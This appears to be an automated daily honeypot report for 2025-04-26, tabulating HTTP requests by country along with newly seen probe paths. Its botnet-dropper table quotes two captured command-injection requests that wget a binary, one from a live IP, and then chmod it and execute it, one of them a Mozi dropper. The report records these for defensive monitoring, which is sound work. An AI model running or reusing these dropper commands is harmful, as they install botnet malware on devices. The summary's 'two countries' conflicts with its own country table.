Daily Report: 2025-04-26#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).
There are 61 new requests that have never been observed before (these were added to the monitored request database.).
A total of 2169 requests were recorded during the day, originating from 2 different countries, with a peak of 458 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| SG | Germany |
| US | Germany |
| US | Germany |
| US | Germany |
| DE | Singapore |
| US | Dubai |
| CN | Georgia |
botnet_dropper_behaviour#
| remote_addr | request |
|---|---|
| 124.220.11.157 | GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11 |
| 122.97.137.118 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
| number_of_occurence | request | |
|---|---|---|
| 9 | 10 | POST /boaform/webLogin HTTP/1.1 |
| 13 | 8 | @RSYTCD: 29 |
| 15 | 8 | \x01\xC2\x00\x00\x00\x04\x00\x00\xB6\x01\x00\x00SQLDB2RA\x00\x01\x00\x00\x04\x01\x01\x00\x05\x00\x1D\x00\x88\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x08\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00@\x00\x00\x00@\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x02\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x03\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00\x80\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x04\x00\x00@\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x09\x00\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x04\x00\x00\x00\x03\x00\x00\x80\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x01\x00\x00\x80\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00@\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7F |
| 16 | 8 | 0:\x02\x04\x03<\xDAS`2\x02\x01\x03\x04\x17cn=mfsaidmxpwgmjbwdczkf\x80\x14mfsaidmxpwgmjbwdczkf |
| 24 | 8 | \x80\x00\x00(\x10l\x8E\xB9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA3\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
| 135 | 3 | GET /protocol.js HTTP/1.1 |
| 229 | 1 | GET /api/bin/440393?time=1745678102189039830 HTTP/1.1 |
| 232 | 1 | GET /tAo9 HTTP/1.1 |
| 233 | 1 | GET /mo8H HTTP/1.1 |
| 234 | 1 | POST /api/user/binLookup?time=1745675229922714312 HTTP/1.1 |
| 235 | 1 | GET /api/bin/440393?time=1745675229513365807 HTTP/1.1 |
| 236 | 1 | GET /config/index?time=1745673646022802997 HTTP/1.1 |
| 250 | 1 | GET /VtCP HTTP/1.1 |
| 251 | 1 | GET /9tYV HTTP/1.1 |
| 252 | 1 | GET /global.xml HTTP/1.1 |
| 254 | 1 | GET /global.ini HTTP/1.1 |
| 255 | 1 | GET /frontend_dev.php HTTP/1.1 |
| 257 | 1 | GET /environment.rb HTTP/1.1 |
| 263 | 1 | POST /api/user/binLookup?time=1745639991360402506 HTTP/1.1 |
| 264 | 1 | GET /api/bin/440393?time=1745639990863567631 HTTP/1.1 |
| 265 | 1 | GET /config/index?time=1745639002513625107 HTTP/1.1 |
| 271 | 1 | GET /admin/jregs.html?idC/205.185.124.1 HTTP/1.1 |
| 286 | 1 | GET /Odin/http/call1745703509 HTTP/1.1 |
| 287 | 1 | GET /OdinHttpCall1745703509 HTTP/1.1 |
| 288 | 1 | GET /odinhttpcall1745703509 HTTP/1.1 |
| 289 | 1 | GET /api/bin/440393?time=1745646206016949498 HTTP/1.1 |
| 291 | 1 | GET /config/index?time=1745643002560262423 HTTP/1.1 |
| 294 | 1 | \x04\x01\x01\xBB@\xE9\xA2hadm:12345\x00 |
| 295 | 1 | \x04\x01\x01\xBB@\xE9\xA2g\x00 |
| 307 | 1 | POST /api/user/binLookup?time=1745646206516345019 HTTP/1.1 |
| 310 | 1 | POST /xmlrpc.php HTTP/1.1 |
| 327 | 1 | \x00\x0E8\xA5\xD3d |
| 328 | 1 | \x00\x0E\x08\xA5\xD3d |
| 332 | 1 | GET /register/ HTTP/1.1 |
| 357 | 1 | GET /api/bin/440393?time=1745680924822974751 HTTP/1.1 |
| 358 | 1 | GET /config/index?time=1745677931951464338 HTTP/1.1 |
| 359 | 1 | POST /api/user/binLookup?time=1745674833779828247 HTTP/1.1 |
| 360 | 1 | GET /api/bin/440393?time=1745674833265012472 HTTP/1.1 |
| 361 | 1 | GET /config/index?time=1745673899887745266 HTTP/1.1 |
| 377 | 1 | guage=0 |
| 381 | 1 | GET /Odin/http/call1745661278 HTTP/1.1 |
| 382 | 1 | GET /OdinHttpCall1745661278 HTTP/1.1 |
| 383 | 1 | GET /odinhttpcall1745661278 HTTP/1.1 |
| 388 | 1 | POST /api/user/binLookup?time=1745680925321167535 HTTP/1.1 |
| 393 | 1 | GET /api/bin/440393?time=1745673888744267888 HTTP/1.1 |
| 394 | 1 | GET /config/index?time=1745673175431253566 HTTP/1.1 |
| 406 | 1 | POST /api/user/binLookup?time=1745677449939887845 HTTP/1.1 |
| 407 | 1 | GET /config/index?time=1745675004300204309 HTTP/1.1 |
| 408 | 1 | POST /api/user/binLookup?time=1745673889336769337 HTTP/1.1 |
| 421 | 1 | GET /api/bin/440393?time=1745638763636972062 HTTP/1.1 |
| 423 | 1 | GET /config/index?time=1745638215863994912 HTTP/1.1 |
| 439 | 1 | GET /Odin/http/call1745651447 HTTP/1.1 |
| 440 | 1 | GET /OdinHttpCall1745651447 HTTP/1.1 |
| 441 | 1 | GET /odinhttpcall1745651447 HTTP/1.1 |
| 447 | 1 | GET /Odin/http/call1745644756 HTTP/1.1 |
| 448 | 1 | GET /OdinHttpCall1745644756 HTTP/1.1 |
| 449 | 1 | GET /odinhttpcall1745644756 HTTP/1.1 |
| 451 | 1 | GET /config/index?time=1745639866649991519 HTTP/1.1 |
| 452 | 1 | POST /api/user/binLookup?time=1745638764419223379 HTTP/1.1 |
| 463 | 1 | GET /-env HTTP/1.1 |
| 468 | 1 | POST /api/user/binLookup?time=1745678102589735975 HTTP/1.1 |
country_iso_code#
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 458 | GB |
| 1 | 351 | DE |
| 2 | 334 | US |
| 3 | 204 | NL |
| 4 | 179 | SC |
| 5 | 143 | CN |
| 6 | 117 | PL |
| 7 | 68 | BG |
| 8 | 49 | BE |
| 9 | 43 | HK |
| 10 | 42 | UA |
| 11 | 22 | JP |
| 12 | 18 | FR |
| 13 | 16 | TR |
| 14 | 15 | SG |
| 15 | 14 | ZA |
| 16 | 10 | IN |
| 17 | 10 | KR |
| 18 | 10 | CA |
| 19 | 9 | AO |
| 20 | 6 | PT |
| 21 | 6 | CH |
| 22 | 6 | IL |
| 23 | 5 | VN |
| 24 | 4 | GH |
| 25 | 4 | NG |
| 26 | 3 | LT |
| 27 | 3 | PA |
| 28 | 2 | MC |
| 29 | 2 | IT |
| 30 | 2 | BR |
| 31 | 2 | ZM |
| 32 | 2 | TN |
| 33 | 2 | KW |
| 34 | 2 | VE |
| 35 | 1 | RU |
| 36 | 1 | ID |
| 37 | 1 | TW |
| 38 | 1 | AE |
| 39 | 1 | EE |
| 40 | 1 | GE |